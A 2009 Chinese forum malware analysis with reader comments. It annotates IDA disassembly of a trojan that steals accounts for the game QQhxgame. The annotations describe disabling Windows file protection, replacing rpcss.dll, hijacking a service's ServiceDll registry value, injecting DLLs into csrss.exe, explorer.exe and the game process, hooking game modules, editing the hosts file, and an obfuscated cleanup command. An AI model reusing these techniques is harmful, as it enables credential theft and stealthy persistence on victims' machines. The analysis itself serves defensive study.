分析某个游戏木马
【文章标题】分析某个游戏木马【文章作者】ZzAge
【文章目标】游戏木马
【相关工具】IDA
【作者 Q Q】85400516
【作者邮箱】zzage@163.com
【作者主页】http://hi.baidu.com/zzage
【文章日期】2009年01月10日
此木马会替换系统文件,修改注册表,替换服务.达到随系统启动,修改hosts文件,屏蔽大部分游戏网站,然后利用HOOK技术盗窃游戏账号的相关信息。
1:
.Upack:004021DF lea eax,
.Upack:004021E5 push eax ; Dest
.Upack:004021E6 call sub_402305 ; 取临时文件夹+ ~%06x.~~~文件名的路径
2:
.Upack:004021F9 lea eax,
.Upack:004021FF push eax ; lpFileName
.Upack:00402200 push 65h ; __int16
.Upack:00402202 push offset nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.Upack:00402207 push 0 ; hModule
.Upack:00402209 call sub_402348 ; 释放资源到以上取的路径
3:
.Upack:0040225F lea eax,
.Upack:00402265 push eax ; Dest
.Upack:00402266 push (offset aR19029_exerund+0Ch) ; int
.Upack:0040226B call sub_402417 ; 取系统目录+rundll32.exe文件路径
4:
.Upack:0040227E lea eax,
.Upack:00402284 push eax ; Dest
.Upack:00402285 push offset aR19029_exerund ; int
.Upack:0040228A call sub_402417 ; 取系统目录+r19029.exe文件路径
.Upack:0040228F add esp, 30h
5:
.Upack:00402299 lea eax,
.Upack:0040229F push 1 ; bFailIfExists
.Upack:004022A1 push eax ; lpNewFileName
.Upack:004022A2 lea eax,
.Upack:004022A8 push eax ; lpExistingFileName
.Upack:004022A9 call CopyFileA ; 把系统目录+rundll32.exe复制到系统目录+r19029.exe
6:
.Upack:004022B6 lea eax,
.Upack:004022BC push eax
.Upack:004022BD lea eax,
.Upack:004022C3 push eax
.Upack:004022C4 lea eax,
.Upack:004022CA push eax
.Upack:004022CB lea eax,
.Upack:004022D1 push eax ; LPCSTR
.Upack:004022D2 lea eax,
.Upack:004022D8 push eax ; LPSTR
.Upack:004022D9 call wsprintfA ; 输出连接字符串‘C:\windows\system32\r19029.exe 释放的资源路径 ins 当前文件路径
7:
.Upack:004022ED lea eax,
.Upack:004022F3 push eax ; lpCommandLine
.Upack:004022F4 call sub_4023C3 ; 用r19029.exe带参数加载运行调用自身释放出来的文件的导出函数(INS)
----------------------------------------------------------------------------
下面分析的是EXE释放出来的dll文件
1:
.data:10013231 call sub_1001389A ; 提升当前进程的权限
.data:10013236 push offset String ; lpString
.data:1001323B mov ebx, offset String2 ; "expl~~@orer.exe"
.data:10013240 push offset SubStr ; "~~@"
.data:10013245 push ebx ; Source
.data:10013246 call sub_10013BDB ; 去掉expl~~@orer.exe中的~~@字符串
.data:1001324B mov esi, StrStrIA
.data:10013251 add esp, 0Ch
.data:10013254 mov edi, offset byte_10011508
.data:10013259 push offset aCsrss_exe ; "csrss.exe"
.data:1001325E push edi
.data:1001325F call esi ; StrStrIA
.data:10013261 test eax, eax
.data:10013263 jz short loc_10013273 ; 比较当前的父进程是否为csrss.exe,是则不跳
.data:1001326C call sub_1001335A ; 创建shcsrss.exeEvent的事件对象和创建csrss.exeMutex互斥体,查找系统目录下文件名为sh00*.dll-shff*.dll的文件
.data:10013271 jmp short loc_100132BE
2:
.data:10013273 push ebx
.data:10013274 push edi
.data:10013275 call esi ; StrStrIA
.data:10013277 test eax, eax
.data:10013279 jz short loc_100132A6 ; 比较当前的父进程是否为explorer.exe,是则不跳
.data:1001327B call sub_1001343B ; 查找系统目录下文件名为sh00*.dll-shff*.dll的文件
.data:10013280 call sub_100134B7 ; 创建一个互斥体
.data:1001328C call sub_100132C2
.data:10013298 push ds:hModule ; hLibModule
.data:1001329E call FreeLibrary
.data:100132A4 jmp short loc_100132BE
3:
.data:100132A6 push offset aSvchost_exe ; "svchost.exe"
.data:100132AB push edi
.data:100132AC call esi ; StrStrIA
.data:100132AE test eax, eax
.data:100132B0 jz short loc_100132BE ; 比较当前的父进程是否为svchost.exe,是则不跳
.data:100132B9 call sub_10013309 ; 提升当前进程的权限,替换服务,系统目录+sh19029.dll插入csrss.exe进程
4:
.data:10012FC3 lea eax,
.data:10012FC9 push eax ; Dest
.data:10012FCA push offset aCsrss_dll ; "csrss.dll"
.data:10012FCF call sub_1001376E ; 取系统目录+csrss.dll的路径
.data:10012FD4 mov edi, CopyFileA
.data:10012FDA pop ecx
.data:10012FDB pop ecx
.data:10012FDC lea eax,
.data:10012FE2 push 0 ; bFailIfExists
.data:10012FE4 mov ebx, offset Buffer
.data:10012FE9 push eax ; lpNewFileName
.data:10012FEA push ebx ; lpExistingFileName
.data:10012FEB call edi ; CopyFileA ; 把自身的复制为系统目录+csrss.dll
.data:10012FF4 lea eax,
.data:10012FFA push eax ; Dest
.data:10012FFB push offset aSpcss_dll ; "spcss.dll"
.data:10013000 call sub_1001376E ;取系统目录+spcss.dll的路径
.data:10013005 lea eax,
.data:1001300B push eax ; Dest
.data:1001300C push offset aRpcss_dll ; "rpcss.dll"
.data:10013011 call sub_1001376E ; 取系统目录+rpcss.dll的路径
.data:1001301D lea eax,
.data:10013023 push eax ; lpMultiByteStr
.data:10013024 call sub_10012F44 ; 调用sfc_os.dll的函数,来关闭对系统文件的保护
.data:10013030 lea eax,
.data:10013036 push eax ; Dest
.data:10013037 push offset a__Servicepackf ; "..\\ServicePackFiles\\i386\\rpcss.dll"
.data:1001303C call sub_1001376E ; 取系统目录+..\\ServicePackFiles\\i386\\rpcss.dll的路径
.data:10013041 mov esi, DeleteFileA
.data:10013047 add esp, 1Ch
.data:1001304A lea eax,
.data:10013050 push eax ; lpFileName
.data:10013051 call esi ; DeleteFileA ; 删除系统目录+..\\ServicePackFiles\\i386\\rpcss.dll文件
.data:1001305A lea eax,
.data:10013060 push eax ; Dest
.data:10013061 push offset aDllcacheRpcss_ ; "dllcache\\rpcss.dll"
.data:10013066 call sub_1001376E ; 取系统目录+dllcache\\rpcss.dll的路径
.data:1001306B pop ecx
.data:1001306C lea eax,
.data:10013072 pop ecx
.data:10013073 push eax ; lpFileName
.data:10013074 call esi ; DeleteFileA ; 删除系统目录+dllcache\\rpcss.dll
.data:10013076 lea eax,
.data:1001307C push eax ; pszPath
.data:1001307D call PathFileExistsA ; 检测系统目录+spcss.dll路径是否有效
.data:1001307D ;
.data:10013083 test eax, eax
.data:10013085 jnz short loc_100130A4
.data:1001308E lea eax,
.data:10013094 push 1 ; dwFlags
.data:10013096 push eax ; lpNewFileName
.data:10013097 lea eax,
.data:1001309D push eax ; lpExistingFileName
.data:1001309E call MoveFileExA ; 把系统目录+rpcss.dll文件移动为系统目录+spcss.dll
.data:1001309E ;
.data:100130A4
.data:100130A4 loc_100130A4: ; CODE XREF: sub_10012FB0+D5 j
.data:100130A4 lea eax,
.data:100130AA push 0 ; bFailIfExists
.data:100130AC push eax ; lpNewFileName
.data:100130AD push ebx ; lpExistingFileName
.data:100130AE call edi ; CopyFileA ; 把自身复制到系统目录+rpcss.dll
.data:100130B0 lea eax,
.data:100130B6 push eax ; int
.data:100130B7 lea eax,
.data:100130BD push eax ; hFile
.data:100130BE call sub_10013B15 ; 把系统目录+rpcss.dll的文件创建时间设置为系统目录+spcss.dll文件的创建时间
.data:100130CA lea eax,
.data:100130D0 push eax ; Dest
.data:100130D1 push offset aSh19029_dll ; "sh19029.dll"
.data:100130D6 call sub_1001376E ; 取系统目录+sh19029.dll路径
.data:100130DB lea eax,
.data:100130E1 push eax ; lpFileName
.data:100130E2 push 65h ; __int16
.data:100130E4 push offset nNumberOfBytesToWrite ; "BIN"
.data:100130E9 push ds:hModule ; hModule
.data:100130EF call sub_100135E1 ; 释放文件到系统目录+sh19029.dll
.data:100130FB lea eax,
.data:10013101 push eax ; int
.data:10013102 lea eax,
.data:10013108 push eax ; hFile
.data:10013109 call sub_10013B15 ; 把系统目录+sh19029.dll的文件创建时间设置为系统目录+spcss.dll文件的创建时间
.data:1001310E add esp, 28h
.data:10013111 pop edi
.data:10013112 pop esi
.data:10013113 pop ebx
.data:10013114 leave
.data:10013115 retn
5:
.data:1001369B push
.data:1001369E lea eax,
.data:100136A4 push offset Format ; "SYSTEM\\CurrentControlSet\\Services\\%s"
.data:100136A9 push eax ; Dest
.data:100136AA call sprintf ; 取SYSTEM\CurrentControlSet\Services\rpcss注册表路径
.data:100136B0 add esp, 0Ch
.data:100136BA lea eax,
.data:100136BD push eax ; phkResult
.data:100136BE push 0F003Fh ; samDesired
.data:100136C3 lea eax,
.data:100136C9 push 0 ; ulOptions
.data:100136CB push eax ; lpSubKey
.data:100136CC push ; hKey
.data:100136CF call RegOpenKeyExA ; 打开SYSTEM\CurrentControlSet\Services\rpcss注册表
.data:100136DC test eax, eax
.data:100136DE jnz short loc_1001374C
.data:100136E7 mov esi, lstrlenA
.data:100136ED mov edi, offset Data ; "LocalSystem"
.data:100136F2 push edi ; lpString
.data:100136F3 call esi ; lstrlenA
.data:100136F5 inc eax
.data:100136F6 push eax ; cbData
.data:100136F7 push edi ; lpData
.data:100136F8 mov edi, RegSetValueExA
.data:100136FE push 2 ; dwType
.data:10013700 push 0 ; Reserved
.data:10013702 push offset ValueName ; "ObjectName"
.data:10013707 push ; hKey
.data:1001370A call edi ; RegSetValueExA ; 设置ObjectName注册表项的值为LocalSystem
.data:1001370C test eax, eax
.data:1001370E jnz short loc_1001374C
.data:10013717 lea eax,
.data:1001371A push eax ; phkResult
.data:1001371B push offset SubKey ; "Parameters"
.data:10013720 push ; hKey
.data:10013723 call RegOpenKeyA ; 打开Parameters注册表项
.data:10013729 test eax, eax
.data:1001372B jnz short loc_1001374C
.data:10013734 push ; lpString
.data:10013737 call esi ; lstrlenA
.data:10013739 inc eax
.data:1001373A push eax ; cbData
.data:1001373B push ; lpData
.data:1001373E push 2 ; dwType
.data:10013740 push 0 ; Reserved
.data:10013742 push offset aServicedll ; "ServiceDll"
.data:10013747 push ; hKey
.data:1001374A call edi ; RegSetValueExA ; 设置ServiceDll注册表项的值为自身的路径
6:
.data:1001333B push eax ; lpThreadId
.data:1001333C push eax ; dwCreationFlags
.data:1001333D push eax ; lpParameter
.data:1001333E push offset StartAddress ; lpStartAddress
.data:10013343 push eax ; dwStackSize
.data:10013344 push eax ; lpThreadAttributes
.data:10013345 call CreateThread ; 创建csrss.exemutex互斥体,并把系统目录+sh19029.dll插入csrss.exe进程
7:(INS导出函数)
.data:10013116 push ebp
.data:10013117 mov ebp, esp
.data:10013119 sub esp, 514h
.data:1001311F push esi
.data:10013120 push edi
.data:10013128 lea eax,
.data:1001312E push eax ; Dest
.data:1001312F push offset aSh19029_ini ; "sh19029.ini"
.data:10013134 call sub_1001376E ; 取系统目录+sh19029.ini路径
.data:10013140 mov edi, 0B40h
.data:10013145 mov esi, offset a7??4Hieib3 ; "7??4^HIeib`^3>"
.data:1001314A push edi ; nNumberOfBytesToWrite
.data:1001314B lea eax,
.data:10013151 push esi ; lpBuffer
.data:10013152 push eax ; lpFileName
.data:10013153 call sub_10013B94 ; 把木马指定收信地址的相关信息写入到sh19029.ini路径
.data:1001315F push edi ; nNumberOfBytesToWrite
.data:10013160 lea eax,
.data:10013166 push esi ; lpBuffer
.data:10013167 push eax ; lpFileName
.data:10013168 call sub_10013B94 ; 同上
.data:1001316D add esp, 20h
.data:10013177 call sub_10012FB0 ; 替换系统文件rpcss.dll,并释放文件到系统目录+sh19029.dll
.data:1001317C xor eax, eax
.data:1001317E push offset Name ; "shcsrss.exeEvent"
.data:10013183 push eax ; bInitialState
.data:10013184 push eax ; bManualReset
.data:10013185 push eax ; lpEventAttributes
.data:10013186 call CreateEventA ; 创建事件
.data:1001318C mov esi, eax
.data:1001318E call GetLastError
.data:10013194 cmp eax, 0B7h
.data:10013199 jnz short loc_100131AB
.data:1001319B push esi ; hEvent
.data:1001319C call SetEvent
.data:100131A2 push esi ; hObject
.data:100131A3 call CloseHandle
.data:100131A9 jmp short loc_100131F5
.data:100131AB ; ---------------------------------------------------------------------------
.data:100131AB
.data:100131AB loc_100131AB: ; CODE XREF: ins+83 j
.data:100131B2 push esi ; hObject
.data:100131B3 call CloseHandle
.data:100131B9 push offset String ; lpString
.data:100131BE mov esi, offset String2 ; "expl~~@orer.exe"
.data:100131C3 push offset SubStr ; "~~@"
.data:100131C8 push esi ; Source
.data:100131C9 call sub_10013BDB
.data:100131CE lea eax,
.data:100131D4 push eax ; int
.data:100131D5 push esi ; lpString2
.data:100131D6 call sub_100137C2 ; 建立进程快照枚举explorer.exe进程
.data:100131E2 push offset Buffer ; lpBuffer
.data:100131E7 push ; dwProcessId
.data:100131ED call sub_10013919 ; 把释放出来的sh19029.dll文件插入到explorer.exe进程
.data:100131F2 add esp, 1Ch
.data:100131F5
.data:100131F5 loc_100131F5: ; CODE XREF: ins+93 j
.data:100131F5 push ; pszPath
.data:100131F8 mov esi, PathFileExistsA
.data:100131FE
.data:100131FE loc_100131FE: ; CODE XREF: ins+109 j
.data:100131FE call esi ; PathFileExistsA
.data:10013200 test eax, eax
.data:10013202 jz short loc_10013221
.data:1001320B push ; lpFileName
.data:1001320E call DeleteFileA ; 删除载体EXE文件
.data:10013214 push 14h ; dwMilliseconds
.data:10013216 call Sleep
.data:1001321C push
.data:1001321F jmp short loc_100131FE
.data:10013221 ; ---------------------------------------------------------------------------
.data:10013221
.data:10013221 loc_10013221: ; CODE XREF: ins+EC j
.data:10013221 pop edi
.data:10013222 pop esi
.data:10013223 leave
.data:10013224 retn 10h
-----------------------------------------------------------------------
以下分析文件的记录为以上dll释放出来的dll文件
1:
.data:2000886D call sub_200075AC ; 提升当前进程的权限
.data:20008872 mov esi, offset aQqhxgame_exe ; "QQhxgame.exe"
.data:20008877 lea edi,
.data:2000887D movsd
.data:2000887E movsd
.data:2000887F movsd
.data:20008880 movsb
.data:20008881 push 3Dh
.data:20008883 xor eax, eax
.data:20008885 pop ecx
.data:20008886 lea edi,
.data:2000888C rep stosd
.data:2000888E stosw
.data:20008890 mov esi, offset Default
.data:20008895 mov ebx, offset SubStr ; "~~@"
.data:2000889A stosb
.data:2000889B push esi ; lpString
.data:2000889C lea eax,
.data:200088A2 push ebx ; SubStr
.data:200088A3 push eax ; Source
.data:200088A4 call sub_20007D57
.data:200088B0 lea eax,
.data:200088B6 push eax ; Dest
.data:200088B7 push offset aSh19029_ini ; "sh19029.ini"
.data:200088BC call sub_20007480 ; 取系统目录+sh19029.ini的路径
.data:200088C1 push 0B40h ; nNumberOfBytesToRead
.data:200088C6 lea eax,
.data:200088CC push offset String2; lpBuffer
.data:200088D1 push eax ; lpFileName
.data:200088D2 call sub_20007B6A ; 读取系统目录+sh19029.ini文件的内容到缓冲区
.data:200088DE push esi ; lpString
.data:200088DF push ebx ; SubStr
.data:200088E0 push offset aExpl@orer_exe ; "expl~~@orer.exe"
.data:200088E5 call sub_20007D57 ; 删除expl~~@orer.ex中的~~@字符串
.data:200088EA add esp, 2Ch
.data:200088F4 mov esi, StrStrIA
.data:200088FA mov edi, offset byte_2000485C
.data:200088FF push offset aCsrss_exe ; "csrss.exe"
.data:20008904 push edi
.data:20008905 call esi ; StrStrIA
.data:20008907 test eax, eax
.data:20008909 jnz short loc_2000894D ; 判断当前父进程是否为csrss.exe,是就跳
.data:2000890B push offset aExpl@orer_exe ; "expl~~@orer.exe"
.data:20008910 push edi
.data:20008911 call esi ; StrStrIA
.data:20008913 test eax, eax
.data:20008915 jnz short loc_2000894D ; 判断当前父进程是否为explorer.exe,是就跳
.data:20008917 lea eax,
.data:2000891D push eax
.data:2000891E push edi
.data:2000891F call esi ; StrStrIA
.data:20008921 test eax, eax
.data:20008923 jz short loc_20008939 ; 判断当前父进程是否为QQhxgame.exe.是则不跳
.data:2000892C mov ecx,
.data:2000892F call sub_20008B74 ; 创建互斥体,查找qqhxgame.exe进程里面模块tradeclient.dll和controller.dll,对其进行Hook.修改hosts文件,进行域名欺骗或阻止访问一些游戏网站,然后在把得到的相关账号数据,发送到指定的收信地址
.data:20008934 jmp loc_200089F0
.data:20008939 ; ---------------------------------------------------------------------------
.data:20008939
.data:20008939 loc_20008939: ; CODE XREF: sub_20008857+CC j
.data:20008940 mov ecx,
.data:20008943 mov eax,
.data:20008945 call dword ptr ; 创建互斥体,修改hosts文件,进行域名欺骗或阻止访问一些游戏网站,查找QQhxgame.exe进程里模块名为QQLogin.exe,然后在QQLogin.exe查找tenhx.dll模块,对进行tenhx.dll模块进行Hook,把得到的相关账号数据发送到指定的收信地址
.data:20008948 jmp loc_200089F0
.data:2000894D ; ---------------------------------------------------------------------------
.data:2000894D
.data:2000894D loc_2000894D: ; CODE XREF: sub_20008857+B2 j
.data:2000894D ; sub_20008857+BE j
.data:20008954 mov ecx,
.data:20008957 call sub_20008A44 ; 创建互斥体,建立进程快照查找QQhxgame.exe进程,再查找系统目录下的sh19029.dll文件,然后把sh19029.dll文件插进QQhxgame.exe进程
.data:20008963 lea eax,
.data:20008969 push eax ; lpBuffer
.data:2000896A push 104h ; nBufferLength
.data:2000896F call GetTempPathA ; 取临时文件夹路径
.data:20008975 lea eax,
.data:2000897B push offset a_ ; "*.~~~"
.data:20008980 push eax ; Dest
.data:20008981 call strcat
.data:20008986 push 6
.data:20008988 mov esi, offset aC@md@C@de@lS ; "c~~@md ~~@/c ~~@de~~@l %s"
.data:2000898D pop ecx
.data:2000898E lea edi,
.data:20008994 rep movsd
.data:20008996 movsw
.data:20008998 push 3Ah
.data:2000899A xor eax, eax
.data:2000899C pop ecx
.data:2000899D lea edi,
.data:200089A3 rep stosd
.data:200089A5 stosw
.data:200089A7 push offset Default; lpString
.data:200089AC lea eax,
.data:200089B2 push ebx ; SubStr
.data:200089B3 push eax ; Source
.data:200089B4 call sub_20007D57
.data:200089B9 add esp, 14h
.data:200089BC lea eax,
.data:200089C2 push eax
.data:200089C3 lea eax,
.data:200089C9 push eax ; Format
.data:200089CA lea eax,
.data:200089D0 push eax ; Dest
.data:200089D1 call sprintf
.data:200089D7 add esp, 0Ch
.data:200089E1 lea eax,
.data:200089E7 push 0 ; uCmdShow
.data:200089E9 push eax ; lpCmdLine
.data:200089EA call WinExec ; 运行cmd /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\*.~~~删除*.~~~文件命令 好文章!学习下! 不能评分 纯支持了 膜拜 :lol :lol 貌似是华夏啊 原帖由 iovejieba 于 2009-1-23 12:24 发表 http://www.52pojie.cn/images/common/back.gif
:lol 貌似是华夏啊
不是MS
就是它了!:lol 虽然看不懂但是看上去就很眼花 支持zz 膜拜ORZ 看上去就很眼花,支持zz :victory: 经典啊 我顶!!! 什么 东西啊 看不懂顶了 data:20008923 jz short loc_20008939 ; 判断当前父进程是否为QQhxgame.exe.是则不跳
QQhxgame.exe--- QQ幻想??